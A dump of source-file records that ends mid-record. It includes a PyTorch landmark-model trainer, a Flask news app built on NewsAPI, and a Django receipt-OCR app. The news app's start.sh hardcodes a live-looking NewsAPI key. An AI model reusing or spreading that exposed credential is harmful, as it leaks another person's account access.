self.optimizer.zero_grad()\n\n output_list = self.model(self.sample)\n loss = 0.0\n for output in output_list:\n loss += self.criterion(output, self.target)\n loss.backward()\n self.optimizer.step()\n return loss.item()\n\n def evaluate(self):\n self.model.eval()\n with torch.no_grad():\n output_list = self.model(self.sample)\n loss = self.criterion(output_list[-1], self.target)\n landmarks = [utils.get_peak_points(x.cpu().numpy()) * 4 for x in output_list]\n self.landmarks = landmarks\n self.heatmaps = output_list\n return loss.item()\n\n def calc_nme(self):\n '''\n calculate normalized mean error\n '''\n landmark = self.landmarks[-1]\n diff = landmark - self.landmark_gt.numpy()\n nme = np.mean(np.sqrt(np.sum(np.square(diff), axis=2))) / self.sample.shape[-1]\n return nme\n\n def _create_model(self, opt):\n return StackedHourGlass(opt['hourglass'])\n\n def save_checkpoint(self, epoch, is_best):\n \"\"\"\n save checkpoint to experimental dir\n \"\"\"\n filename = os.path.join(self.checkpoint_dir, 'last_ckp.pth')\n print('===> Saving last checkpoint to [%s] ...]' % filename)\n ckp = {\n 'epoch': epoch,\n 'state_dict': self.model.module.state_dict() if isinstance(self.model, nn.DataParallel) else self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'best_pred': self.best_pred,\n 'best_epoch': self.best_epoch,\n 'records': self.records\n }\n torch.save(ckp, filename)\n if is_best:\n print('===> Saving best checkpoint to [%s] ...]' %\n filename.replace('last_ckp', 'best_ckp'))\n torch.save(ckp, filename.replace('last_ckp', 'best_ckp'))\n\n if epoch % self.train_opt['save_interval'] == 0:\n print('===> Saving checkpoint [%d] to [%s] ...]' %\n (epoch,\n filename.replace('last_ckp', 'epoch_%d_ckp' % epoch)))\n\n torch.save(\n ckp, filename.replace('last_ckp', 'epoch_%d_ckp' % epoch))\n\n def load(self):\n \"\"\"\n load or initialize network\n \"\"\"\n if (self.is_train\n and self.opt['train']['pretrain']) or not self.is_train:\n model_path = self.opt['train']['pretrained_path']\n if model_path is None:\n raise ValueError(\n \"[Error] The 'pretrained_path' does not declarate in *.json\"\n )\n\n print('===> Loading model from [%s]...' % model_path)\n if self.is_train:\n checkpoint = torch.load(model_path)\n self.model.load_state_dict(checkpoint['state_dict'])\n\n if self.opt['train']['pretrain'] == 'resume':\n self.cur_epoch = checkpoint['epoch'] + 1\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n self.records = checkpoint['records']\n self.best_pred = checkpoint['best_pred']\n self.best_epoch = checkpoint['best_epoch']\n\n else:\n checkpoint = torch.load(model_path)\n if 'state_dict' in checkpoint.keys():\n checkpoint = checkpoint['state_dict']\n load_func = self.model.module.load_state_dict if isinstance(self.model, nn.DataParallel) \\\n else self.model.load_state_dict\n load_func(checkpoint)\n\n # else:\n # self._net_init()\n\n def get_current_learning_rate(self):\n return self.optimizer.param_groups[0]['lr']\n\n def update_learning_rate(self, epoch):\n self.scheduler.step(epoch)\n\n# def get_current_log(self):\n# log = OrderedDict()\n# log['epoch'] = self.cur_epoch\n# log['best_pred'] = self.best_pred\n# log['best_epoch'] = self.best_epoch\n# log['records'] = self.records\n# return log\n\n# def set_current_log(self, log):\n# self.cur_epoch = log['epoch']\n# self.best_pred = log['best_pred']\n# self.best_epoch = log['best_epoch']\n# self.records = log['records']\n\n def save_current_log(self):\n data_frame = pd.DataFrame(\n data={'train_loss': self.records['train_loss']\n , 'val_loss': self.records['val_loss']\n , 'nme': self.records['nme']\n , 'lr': self.records['lr']\n },\n index=range(1, self.cur_epoch + 1)\n )\n data_frame.to_csv(os.path.join(self.exp_root, 'train_records.csv'),\n index_label='epoch')\n \n def print_network(self):\n \"\"\"\n print network summary including module and number of parameters\n \"\"\"\n s, n = self.get_network_description(self.model)\n if isinstance(self.model, nn.DataParallel):\n net_struc_str = '{} - {}'.format(\n self.model.__class__.__name__,\n self.model.module.__class__.__name__)\n else:\n net_struc_str = '{}'.format(self.model.__class__.__name__)\n\n print(\"==================================================\")\n print(\"===> Network Summary\\n\")\n net_lines = []\n line = s + '\\n'\n print(line)\n net_lines.append(line)\n line = 'Network structure: [{}], with parameters: [{:,d}]'.format(\n net_struc_str, n)\n print(line)\n net_lines.append(line)\n\n if self.is_train:\n with open(os.path.join(self.exp_root, 'network_summary.txt'),\n 'w') as f:\n f.writelines(net_lines)\n\n print(\"==================================================\")\n\n def get_current_visual(self):\n res_heatmaps = [\n np.squeeze(x.cpu().numpy(), axis=0) for x in self.heatmaps\n ]\n heatmap_gt = np.squeeze(self.target.cpu().numpy(), axis=0)\n img = np.squeeze(self.sample.cpu().numpy(), axis=0)\n mean = np.reshape(np.array(self.opt['datasets']['train']['mean']), (3, 1, 1))\n fig = utils.plot_heatmap_compare(res_heatmaps, heatmap_gt, img, mean)\n return fig\n \n def log_current_visual(self, img_name, tb_logger, current_step):\n res_heatmaps = [\n np.squeeze(x.cpu().numpy(), axis=0) for x in self.heatmaps\n ]\n heatmap_gt = np.squeeze(self.target.cpu().numpy(), axis=0)\n img = np.squeeze(self.sample.cpu().numpy(), axis=0)\n mean = np.reshape(np.array(self.opt['datasets']['train']['mean']), (3, 1, 1))\n fig = utils.plot_heatmap_compare(res_heatmaps, heatmap_gt, img, mean)\n tb_logger.add_figure(img_name, fig, global_step=current_step)\n\n def save_current_visual(self, img_name, epoch):\n save_dir = os.path.join(self.visual_dir, img_name)\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n res_heatmaps = [\n np.squeeze(x.cpu().numpy(), axis=0) for x in self.heatmaps\n ]\n heatmap_gt = np.squeeze(self.target.cpu().numpy(), axis=0)\n img = np.squeeze(self.sample.cpu().numpy(), axis=0)\n mean = np.reshape(np.array(self.opt['datasets']['train']['mean']), (3, 1, 1))\n fig = utils.plot_heatmap_compare(res_heatmaps, heatmap_gt, img, mean)\n fig.savefig(os.path.join(save_dir, '%05d.png' % epoch))\n\n def get_network_description(self, network):\n if isinstance(network, nn.DataParallel):\n network = network.module\n s = str(network)\n n = sum(map(lambda x: x.numel(), network.parameters()))\n return s, n\n"
}
] | 8 |
Isaacg94/news-highlight
|
https://github.com/Isaacg94/news-highlight
|
f99348299f0f1370de416775cdef962ce77064a9
|
69d34504a426bf436fe299215ca71d51fa313b90
|
d35d00cde557886ad267732ed00eef6647cf04f3
|
refs/heads/master
| 2023-05-11T12:56:05.842136 | 2021-03-20T18:31:15 | 2021-03-20T18:31:15 | 214,460,578 | 0 | 4 | null | 2019-10-11T14:44:38 | 2021-03-20T18:31:17 | 2023-05-01T20:14:55 |
Python
|
[
{
"alpha_fraction": 0.6950286626815796,
"alphanum_fraction": 0.6950286626815796,
"avg_line_length": 31.71875,
"blob_id": "b7d6ce7395b0da70b6dbd0ab8875c39c3466628d",
"content_id": "a064c9c1c694815fd2543ef21b7f0bae4bb7e0f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1046,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 32,
"path": "/app/main/views.py",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "from flask import render_template,request,redirect,url_for\nfrom . import main\nfrom ..request import get_sources, get_articles\n\n\n# Views\[email protected]('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n general_categories = get_sources('general')\n # business_category = get_sources('business')\n # entertainment_categories = get_sources('entertainment')\n # sports_categories = get_sources('sports')\n # technology_categories = get_sources('technology')\n # science_category = get_sources('science')\n # health_category = get_sources('health')\n\n title = 'World News Highlights'\n return render_template('index.html',title = title, general = general_categories)\n\[email protected]('/newsarticle/<id>')\ndef newsarticle(id):\n\n '''\n View article page function that returns the article details page and its data\n '''\n articles_items = get_articles(id)\n title = f'{id} | News Articles'\n return render_template('newsarticle.html',title = title,articles = articles_items)"
},
{
"alpha_fraction": 0.5150214433670044,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 15.714285850524902,
"blob_id": "8e53a202d00830f46429b0a36d3c68ba74b58ca8",
"content_id": "4f48c7784feebf1376947c3883552112f40779e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 233,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 14,
"path": "/requirements.txt",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "click==6.7\ndominate==2.3.1\nFlask==1.0\nFlask-Bootstrap==3.3.7.1\nFlask-Script==2.0.5\nFlask-WTF==0.14.2\ngunicorn==19.7.1\nitsdangerous==0.24\nJinja2==2.11.3\nMarkupSafe==1.0\nvisitor==0.1.3\nWerkzeug==0.15.3\nWTForms==2.1\npkg-resources==0.0.0"
},
{
"alpha_fraction": 0.5662650465965271,
"alphanum_fraction": 0.8433734774589539,
"avg_line_length": 20,
"blob_id": "e48882212a35cbd883bbc9d48c609d5b75b61f55",
"content_id": "22ea2cbfb35d7a0ad1ac8d1ed0cf85d7ba6ae073",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 83,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 4,
"path": "/start.sh",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "export NEWS_API_KEY='4fa35678b9524ae197e61c351aafa582'\n\n\npython3.6 manage.py server"
},
{
"alpha_fraction": 0.6572797894477844,
"alphanum_fraction": 0.6572797894477844,
"avg_line_length": 29.35454559326172,
"blob_id": "822e3e052ffcc570dca52620ca3a25d91ae88a78",
"content_id": "4516bcc7628f26dc0a39ece331912bd78ece3fd5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3338,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 110,
"path": "/app/request.py",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "import urllib.request,json\nfrom .models import Sources,Articles\n\n\n# Getting api key\napi_key = None\n\n# Getting the movie base url\nbase_url = None\nbase_article_url = None\n\ndef configure_request(app):\n global api_key,base_url,base_article_url\n api_key = app.config['NEWS_API_KEY']\n base_url = app.config['NEWS_API_BASE_URL']\n base_article_url = app.config['ARTICLES_API_BASE_URL']\n\n\ndef get_sources(category):\n '''\n Function that gets the json response to our url request\n '''\n get_sources_url = base_url.format(api_key)\n\n with urllib.request.urlopen(get_sources_url) as url:\n get_sources_data = url.read()\n get_sources_response = json.loads(get_sources_data)\n\n sources_results = None\n\n if get_sources_response['sources']:\n sources_results_list = get_sources_response['sources']\n sources_results = process_sources_results(sources_results_list)\n\n return sources_results\n\ndef process_sources_results(sources_list):\n \"\"\"\n Function that processes the sources result and transform them to a list of Objects\n\n Args:\n sources_list: A list of dictionaries that contain sources details\n\n Returns :\n sources_results: A list of source objects\n \"\"\"\n \n sources_results = []\n for source_item in sources_list:\n id = source_item.get('id')\n name = source_item.get('name')\n description = source_item.get('description')\n url = source_item.get('url')\n category = source_item.get('category')\n language = source_item.get('language')\n country = source_item.get('country')\n\n # if poster:\n source_object = Sources(id, name, description, url, category, language, country)\n sources_results.append(source_object)\n\n return sources_results\n\n\n\ndef get_articles(id):\n '''\n Function that gets the json Articles response to our url request\n '''\n get_articles_url = base_article_url.format(id,api_key)\n\n with urllib.request.urlopen(get_articles_url) as url:\n get_articles_data = url.read()\n get_articles_response = json.loads(get_articles_data)\n\n articles_results = None\n\n if get_articles_response['articles']:\n articles_results_list = get_articles_response['articles']\n articles_results = process_articles_results(articles_results_list)\n\n return articles_results\n\ndef process_articles_results(articles_list):\n \"\"\"\n Function that processes the articles result and transform them to a list of Objects\n\n Args:\n articles_list: A list of dictionaries that contain sources details\n\n Returns :\n articles_results: A list of source objects\n \"\"\"\n \n articles_results = []\n for article_item in articles_list:\n id = article_item.get('id')\n author = article_item.get('author')\n title = article_item.get('title')\n description = article_item.get('description')\n url = article_item.get('url')\n urlToImage = article_item.get('urlToImage')\n publishedAt = article_item.get('publishedAt')\n content = article_item.get('content')\n\n if urlToImage:\n article_object = Articles(id, author, title, description, url, urlToImage, publishedAt, content)\n articles_results.append(article_object)\n\n return articles_results"
},
{
"alpha_fraction": 0.6842989325523376,
"alphanum_fraction": 0.7162048816680908,
"avg_line_length": 58.599998474121094,
"blob_id": "7230e9b5fe53324b9966f787558c215957575b30",
"content_id": "33fe43afc2e7112b8dc81517d85c0b972a8493d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1193,
"license_type": "permissive",
"max_line_length": 786,
"num_lines": 20,
"path": "/tests/test_articles.py",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom app.models import Articles\n\nclass ArticlesTest(unittest.TestCase):\n '''\n Test Class to test the behaviour of the Articles class\n '''\n\n def setUp(self):\n '''\n Set up method that will run before every Test\n '''\n self.new_article = Articles(\"cnn\",\"Toyin Owoseje, CNN\",\"Kim Kardashian defends Meghan and Harry over press treatment\",\"As the UK's Prince Harry takes on the tabloid media over its treatment of his wife, Meghan, Duchess of Sussex, Kim Kardashian has weighed in on the royal couple's side.\",\"https://www.cnn.com/2019/10/14/entertainment/kim-kardashian-meghan-harry-scli-intl/index.html\",\"https://cdn.cnn.com/cnnnext/dam/assets/191014055104-meghan-markle-prince-harry-kim-kardashian-split-super-tease.jpg\",\"2019-10-14T12:57:42Z\",\"(CNN)As the UK's Prince Harry takes on the tabloid media over its treatment of his wife, Meghan, Duchess of Sussex, Kim Kardashian has weighed in on the royal couple's side. The reality TV star, who has long been a target of intense public scrutiny, has come… [+1678 chars]\")\n\n def test_instance(self):\n self.assertTrue(isinstance(self.new_article,Articles))\n\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.6486997604370117,
"alphanum_fraction": 0.6576831936836243,
"avg_line_length": 38.924530029296875,
"blob_id": "169e1d9bdad8b96613a92851f05aec105123f893",
"content_id": "d591d7762e989fdc1b7a7f0a64f65a0288618655",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2115,
"license_type": "permissive",
"max_line_length": 366,
"num_lines": 53,
"path": "/README.MD",
"repo_name": "Isaacg94/news-highlight",
"src_encoding": "UTF-8",
"text": "# GitHub Search\n\n\n\n\n\n### Author\n **[Isaac Gichuru.](https://github.com/Isaacg94)**\n\n## Description\n\nA web application made using Python's Flask that uses the News API to allow a user to keep up with the World News by providing them with daily highlights straight from their preferred sources.\n\n**[Live-Link to site.](https://world-news-highlights.herokuapp.com/)**\n## Features\n* A landing page with a list of some of the most popular news publishers that exists in the world right now.\n* A display of articles from a selected news publisher.\n* A navigation bar with a link to navigate back to the landing page.\n\n## Behaviour Driven Development (BDD)\n|Behaviour \t | Input \t | Output |\n|----------------------------------------------|:-----------------------------------:|-----------------------------:| \n| Page loads, landing page with a list of the various, news sources. | The user , once in the landing page, can click on a news source to get articles from that specific news publisher. | The day's articles from that news publisher as well as an option to read the full article from the publisher's website, are displayed. | |\n\n\n## Setup/Installation Requirements\nHere is a run through of how to set up the application:\n* Step 1 : Clone this repository using the git clone link:\n * **`git clone https://github.com/Isaacg94/news-highlight`**\n* Step 2 : Navigate to the directory:\n * **`cd news-highlight-master`**\n* Step 3 : Open the directory created with your favorite IDE. If Atom type **`atom .`** if VSCode type **`code .`** . This will lauch the editor with the project setup,\n* Now feel free to hack around the project.\n\n## Known Bugs\n* None currently.\n\n\n## Technologies Used\n\n- Python 3.6.8\n- HTML\n- CSS\n- Bootstrap 4.3.1\n\n## Support and contact details\n\nPrimary E-mail Address: [email protected]\n\n### License\n*MIT License* [](license/MIT)\n\nCopyright (c) 2019 **Isaac Gichuru**"
}
] | 6 |
stodola/mlshopping
|
https://github.com/stodola/mlshopping
|
6c3bbb9efb6fd5a0ba88f435a84cb48d502c38a8
|
37f4cd1780cf6985ba98a431843cff62647fb00c
|
b5c832986b1c13bd0195892f0f8f7f793977c475
|
refs/heads/master
| 2021-04-30T16:32:00.075821 | 2017-02-03T22:16:30 | 2017-02-03T22:16:30 | 80,062,903 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8226950168609619,
"alphanum_fraction": 0.8226950168609619,
"avg_line_length": 22.5,
"blob_id": "9f7db1d6348df0c7375ccc767c8a37930028f9a3",
"content_id": "3a49fddcf60b7570033cdc3203c0216bff44e336",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 141,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 6,
"path": "/receipt/admin.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Paragon, ParagonItems\n\n\nadmin.site.register(Paragon)\nadmin.site.register(ParagonItems)\n"
},
{
"alpha_fraction": 0.7444444298744202,
"alphanum_fraction": 0.7444444298744202,
"avg_line_length": 17,
"blob_id": "f8e61e08e632cb5567ef80f3d7544a35994f63b0",
"content_id": "3677c3aaff541debe0d892b027230aeba63863b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/log_user/apps.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass LogUserConfig(AppConfig):\n name = 'log_user'\n"
},
{
"alpha_fraction": 0.6726457476615906,
"alphanum_fraction": 0.6793721914291382,
"avg_line_length": 22.473684310913086,
"blob_id": "fbc340d4ea1f7a0bd7ea91ea5b9cf7722ca6468f",
"content_id": "eb69579f3787a5378c364727ac19816cac269e44",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 19,
"path": "/log_user/urls.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url,include\nfrom django.contrib import admin\n\nfrom log_user import views\n\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n url(r'^login/$', views.login1,name='login' ),\n url(r'^register/$', views.register1, name='register'),\n url(r'^regsuccess/$', views.register_sussess, name = 'success'),\n url(r'^logout/$', views.logout1, name='logout'),\n\n \n \n ]\n"
},
{
"alpha_fraction": 0.4788602888584137,
"alphanum_fraction": 0.49923408031463623,
"avg_line_length": 26.6610164642334,
"blob_id": "4aa9d8f234b3f257bee4e68c3ed4ff6238e263bf",
"content_id": "2dbed1005f12ca7c03503b2d95b6f8f1502e2be5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6529,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 236,
"path": "/receipt/image_utils.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "import Levenshtein\nimport pytesseract\nfrom PIL import Image\nimport io\n\n\ndef to_text(tekst):\n buf = io.StringIO(tekst)\n tekst=buf.readlines()\n\n poczatek=[] \n koniec=[]\n last_chance = []\n\n\n for i, item in enumerate(tekst):\n\n row = item.replace('\\n','').split(' ') \n for j in row:\n lev=Levenshtein.distance(j, 'FISKALNY')\n poczatek.append((lev,j)) \n\n\n lev2=Levenshtein.distance(j, 'Sprzed.')\n koniec.append((lev2,i,j))\n lev3=Levenshtein.distance(j, 'SP.OP.')\n koniec.append((lev3,i,j))\n lev4=Levenshtein.distance(j, 'Sp.op.')\n koniec.append((lev4,i,j))\n lev5=Levenshtein.distance(j, 'Sprzedaż')\n koniec.append((lev5,i,j))\n lev6_pln=Levenshtein.distance(j, 'PLN')\n last_chance.append((lev6_pln,j))\n # lev7=Levenshtein.distance(j, 'SP.OP.')\n \n\n poczatek1 = min(poczatek)[1]\n\n new_list=[]\n for i, item in enumerate(tekst):\n row = item.replace('\\n','').split(' ')\n for j in row:\n if j == poczatek1:\n new_list = tekst[i+1:]\n break\n# print(new_list)\n new_list2=[]\n \n #ostatnia szansa jak trzeba uzyc PLN\n if min(koniec)[0] >=4 and lev6_pln ==0:\n koniec1 = 'PLN'\n print('if 1')\n for i,item in enumerate(new_list):\n if koniec1 in item:\n new_list2 = new_list[:i]\n break\n#####################################################################################\n elif min(koniec)[0]<4:\n koniec1 = min(koniec)[2]\n for i,item in enumerate(new_list):\n if koniec1 in item:\n new_list2 = new_list[:i]\n break\n else:\n new_list2 = new_list[:]\n\t \n\n\n tekst2= new_list2[:]\n\n\n\n\n #removing first element from list if it is new line or it is equal to 1\n while tekst2[0] == '\\n' or len(tekst2[0])==1:\n tekst2=tekst2[1:]\n\n while tekst2[-1] == '\\n' or len(tekst2[-1])==1:\n del tekst2[-1]\n\n tekst3=[]\n\n i=0\n while True: #to sie przydaje jak ta sama linjka jest rozrzucona na dwa wiersze\n try :\n if tekst2[i+1] == '\\n':\n tekst3.append(tekst2[i]+' ' +tekst2[i+2])\n i+=3\n else:\n tekst3.append(tekst2[i])\n i+=1\n except IndexError:\n try: \n tekst3.append(tekst2[i])\n break\n except:\n break\n #tu moze byc kiedys problem jak nie bedzie co zastapic\n tekst4=[]\n for i in tekst3:\n tekst4.append(i.replace('\\n',''))\n\n #funkcja sprawdzajaca czy w slowie jest wiecej liter czy liczb\n def letters_check(word):\n letters = 0\n numbers = 0\n for i in word:\n try :\n int(i)\n numbers +=1\n except ValueError:\n letters +=1\n\n if letters >numbers:\n return 'letter'\n else:\n return 'number'\n\n\n cena = []\n \n #to zadziala jak zalozymy ze nie ma juz wolnych linii\n for i, item in enumerate(tekst4):\n for j, item1 in enumerate(item.split(' ')[::-1]):\n if len(item1) == 1:\n continue\n else:\n cena.append(item1)\n break\n\n\n #to ma na celu pozbycie sie liter z listy z cenami\n #to wynika z tego ze tesseract jest zle wytrenowany pozniej do usniecia\n '''\n new_cena_1=[]\n def bez_liter(lista):\n for i, item in enumerate(lista):\n if 'T' in item:\n new_item = item.replace('T', '1')\n new_cena_1.append(new_item)\n\n elif 'U' in item:\n new_item = item.replace('U', '0')\n new_cena_1.append(new_item)\n else:\n new_cena_1.append(item)\n bez_liter(cena)\n\n #kod testowy for paragon z biedronka\n #p=new_cena_1.pop(2)\n #p1=p+'D'\n #new_cena_1.insert(2, p1)\n\n\n # to teraz sie tyczy paragonow ze sklepow typy biedronka, ktore maja\n # na koncu litere razem z suma\n\n new_cena_2=[]\n def bez_liter_beidra(lista):\n for i, item in enumerate(lista):\n if letters_check(item[-1]) == 'letter':\n new_item = item[:-1]\n new_cena_2.append(new_item)\n else:\n new_cena_2.append(item)\n\n bez_liter_beidra(new_cena_1)\n\n def to_decimal_number(lista):\n new_cena_3=[]\n for i, item in enumerate(lista):\n if ',' in item:\n new_item = item.replace(',', '.')\n new_cena_3.append(new_item)\n else:\n new_cena_3.append(item)\n\n return new_cena_3\n\n new_cena_3 = to_decimal_number(new_cena_2)\n\n def to_floating_point(lista):\n new_cena_4=[]\n for i, item in enumerate(lista):\n try:\n a=float(item)\n new_cena_4.append(a)\n except ValueError:\n new_cena_4.append(None)\n\n return new_cena_4\n\n new_cena_4 = to_floating_point(new_cena_3)\n '''\n\n #teraz zajmiemy sie itemami z przodu\n\n #ta funkcja ma na celu pozbycie sie spacji na pierwszym mijescu w elementach paragonu\n #co mialo mijesce w jednym z paragonow\n def infront_spaces(lista):\n tekst5=[]\n for i, item in enumerate(lista):\n if item[0] ==' ':\n while item[0] ==' ':\n item = item[1:]\n tekst5.append(item)\n else:\n tekst5.append(item)\n return tekst5\n\n #tekst5 =infront_spaces(tekst4)\n tekst5=tekst4[:]\n nazwa_produktu = []\n for i, item in enumerate(tekst5):\n nazwa=''\n for j, item1 in enumerate(item.split(' ')): #to wezmie tylko po uwage 4 pierwsze elemtny\n if j==0:\n nazwa=nazwa+item1+' '\n else: # j >0:\n if letters_check(item1) == 'letter' and len(item1)>1:\n nazwa=nazwa+item1+' '\n elif letters_check(item1) == 'letter' and len(item1) == 1 and item1 =='Z':\n nazwa=nazwa+item1+' '\n else:\n break\n\n nazwa_produktu.append(nazwa)\n\n return zip(nazwa_produktu,cena)\n \nif __name__ =='__main__':\n import sys\n img = sys.argv[1]\n tekst_from_img =pytesseract.image_to_string(Image.open(img), lang='pol')\n rt=to_text(tekst_from_img)\n print(list(rt))\n"
},
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 27.75,
"blob_id": "90ed097bf14caa81dbaf8dc568d67259d32ec128",
"content_id": "1515061d753b4a564f74104d26378384f35439a9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 12,
"path": "/receipt/urls.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom receipt import views\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n url(r'^receipt-list/$', views.lista_paragonow, name='lista_paragonow'),\n url(r'^receipt-form/$', views.add_receipt, name='add_receipt'),\n ]\n"
},
{
"alpha_fraction": 0.6496496200561523,
"alphanum_fraction": 0.6536536812782288,
"avg_line_length": 28.294116973876953,
"blob_id": "8d0cadd1cb21c62626303dfae09e9b6b1ef893b9",
"content_id": "d7cd5b7791d962d3e352f9299dff580ee01c8453",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 999,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 34,
"path": "/receipt/views.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect\nfrom .forms import ParagonForm\nfrom .models import Paragon\nimport pytesseract\n\nfrom .tasks import items_from_image\n\nfrom PIL import Image, ImageFilter\n\ndef start_page(request):\n return render(request,'base.html')\n\n\ndef lista_paragonow(request):\n qs = Paragon.objects.filter(user1=request.user)[::-1] \n context={'qs':qs}\n return render(request, 'receipt/paragon_list2.html', context)\n\n\ndef add_receipt(request):\n if request.method == 'POST':\n form =ParagonForm(request.POST, request.FILES)\n print(request.FILES['image'])\n if form.is_valid():\n new_rec =form.save(commit=False)\n new_rec.user1=request.user \n new_rec.save()\n items_from_image.delay(new_rec.image.name)\n return redirect('paragony:lista_paragonow')\n else:\n form =ParagonForm()\n \n context = {'form':form}\n return render (request, 'receipt/paragon_form.html', context)\n\n\n\n"
},
{
"alpha_fraction": 0.657819926738739,
"alphanum_fraction": 0.6606634855270386,
"avg_line_length": 30.969696044921875,
"blob_id": "d216b3ff1372032642db4331edd2001b166016b1",
"content_id": "8e1247b1c0cce97d13f3df6615ad26d2668f36b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2110,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 66,
"path": "/log_user/views.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect,get_object_or_404\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login,logout\nfrom django.views.generic import View\nfrom .forms import UserForm\nfrom django.core.urlresolvers import reverse\n\n\n\ndef logout1(request):\n user = request.user.username\n logout(request)\n context = {'user':user}\n return render (request, 'log_user/logout.html', context)\n\ndef register_sussess(request):\n return render (request, 'log_user/successful_registration.html')\n\ndef login1(request):\n form = UserForm ()\n context = {'form':form}\n \n if request.method == 'POST':\n form = UserForm(request.POST)\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate (username=username, password=password)\n if user is not None:\n login(request, user)\n # return redirect('paragony:lista_paragonow')\n return redirect('home')\n else:\n context['flag'] = True\n \n return render(request, 'log_user/login.html', context)\n\n\ndef register1(request):\n form = UserForm ()\n context = {'form': form}\n \n if request.method == 'POST':\n form = UserForm (request.POST)\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate (username=username, password=password)\n if form.is_valid():\n user=form.save(commit=False)\n user.set_password(password)\n user.save()\n return HttpResponseRedirect('/regsuccess/')\n else:\n context['flag'] = True\n return render(request, 'log_user/register.html', context)\n\n@login_required\ndef user_loged(request):\n user=request.user.username\n quaryset = Pytania.objects.filter(user=user).values('carddeck').distinct()\n context = {'pytania':quaryset,}\n return render (request, 'user_loged.html', context)\n"
},
{
"alpha_fraction": 0.7050754427909851,
"alphanum_fraction": 0.714677631855011,
"avg_line_length": 35.400001525878906,
"blob_id": "95cb003f5959d358d95d2299145dc392b4195fe0",
"content_id": "a40a7026789dec414063fc5967a4a5d2a0989238",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 729,
"license_type": "permissive",
"max_line_length": 186,
"num_lines": 20,
"path": "/receipt/models.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Paragon(models.Model):\n image = models.FileField()\n image_data = models.TextField(null=True, blank=True, default='Processing image... Refresh to check for results. If that doesnt help please wait or do something else one the website')\n user1 = models.ForeignKey(User, blank=True, null=True)\n\ndef __str__(self):\n return str(self.image)\n\n\nclass ParagonItems(models.Model):\n id_paragonu =models.ForeignKey(Paragon, blank=True, null=True) \n cena = models.CharField(max_length=120, null=True, blank=True)\n produkt = models.CharField(max_length=120, null=True, blank=True)\n\n def __str__(self):\n return (self.produkt)\n\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 18.75,
